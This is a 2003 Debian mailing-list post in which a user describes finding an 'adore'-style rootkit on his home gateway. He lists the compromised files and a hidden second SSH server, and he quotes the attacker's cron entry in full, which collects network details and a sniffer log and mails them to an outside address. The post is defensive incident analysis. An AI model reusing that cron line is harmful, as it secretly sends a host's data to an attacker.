[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Suspected system compromise (was: Re: console login fails)

On Mon, Dec 22, 2003 at 04:29:48AM -0800, Karsten M. Self wrote:
> on Fri, Dec 19, 2003 at 05:25:13PM +1100, Patrick Lesslie wrote:
> > On Fri, Dec 19, 2003 at 02:12:48PM +1100, Patrick Lesslie wrote:
> >  unable to make backup link of `./bin/login' before installing new version: Operation not permitted
> > Errors were encountered while processing:
> >  /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb
> > E: Sub-process /usr/bin/dpkg returned an error code (1)
> > 
> > I'm root, and I'm not sure why this is failing.
> 
> I smell a system compromise.

You smell correctly.  I discovered it shortly after Kent's post,
when my old woody chkrootkit found suspicious files in
/lib/security/.config/.  It turned out to be (a variant of perhaps)
the "adore" rootkit.  I don't know how they got in, there weren't
old enough logs, and perhaps some were removed, but let's just
say security wasn't "stellar".  It had been compromised for 73 days
before I got around to fixing what I thought was just a bug in the
virtual console login.  It was a home gateway, and a desktop with
heaps of packages.

> First try 'lsattr /bin/login'.  Check that the partition is mounted
> writable.
 
# ls -l /old/bin/login
suSiadAc------ /old/bin/login
# ls -l /bin/login
-------------- /bin/login

> Look at your process table -- 'cd /proc; echo *' or 'cd /proc; ls <tab>'
> should show you what's available.  Treat with suspicion any process IDs
> which persistantly appear in output of one or the other of those
> actions, but not in 'ps ux' output.
>
> Better:  Immediately disconnect your system from network and boot known
> good media:  a rescue disk, LNX-BBC, Damn Small Linux, Knoppix,
> tomsrtbt, etc.  Compare /bin/login vs. md5sum from
> /var/lib/dpkg/info/login.md5sums.
 
It was empty, so the sums probably would not match :)

>     http://www.wiggy.net/debian/developer-securing/

Thanks for those good tips.

We found some compromised files by modification date:

/bin/login
/lib/libext-2.so.7  ("dbx7If0tG/8ZM")
/etc/ld.so.hash     ("dbx7If0tG/8ZM")
/usr/include/hosts.h ("3 4784\n4 4784")
/etc/shadow-
/var/spool/cron/crontabs/operator
/lib/security/.config/ssh/ssh_random_seed
/lib/security/.config/ssh/sshd_config
/lib/security/.config/ssh/ssh_host_key.pub (a key for "root@NoraD")
/lib/security/.config/sshd
/usr/sbin/xntps
/var/tmp/.../s
/var/tmp/.../apal/samba
/var/tmp/.../apal/scan

The first four files had modified attributes.  The last five were
binaries.  The kit apparently enables a second ssh server on a high
port like 15000, with public key authentication.

My favourite file was the last one, which contained this cron entry:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (crontab-entry installed on Thu Oct  9 09:36:03 2003)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 1 * * /sbin/ifconfig |grep inet >/tmp/.log 2>/dev/null; /bin/hostname -f >>/tmp/.log 2>/dev/null; /usr/local/games/banner /usr/local/games/tcp.log >>/tmp/.log 2>/dev/null; cat /tmp/.log|mail -s 'tcp.log' rooturi2000@yahoo.com >/dev/null 2>&1; rm -f /tmp/.log >/dev/null 2>&1

So much for me hoping that our dynamic IP would have helped ;-)

So, I've reinstalled on another partition, and put a gateway in between, 
and I've learned some lessons too.

Patrick
Reply to: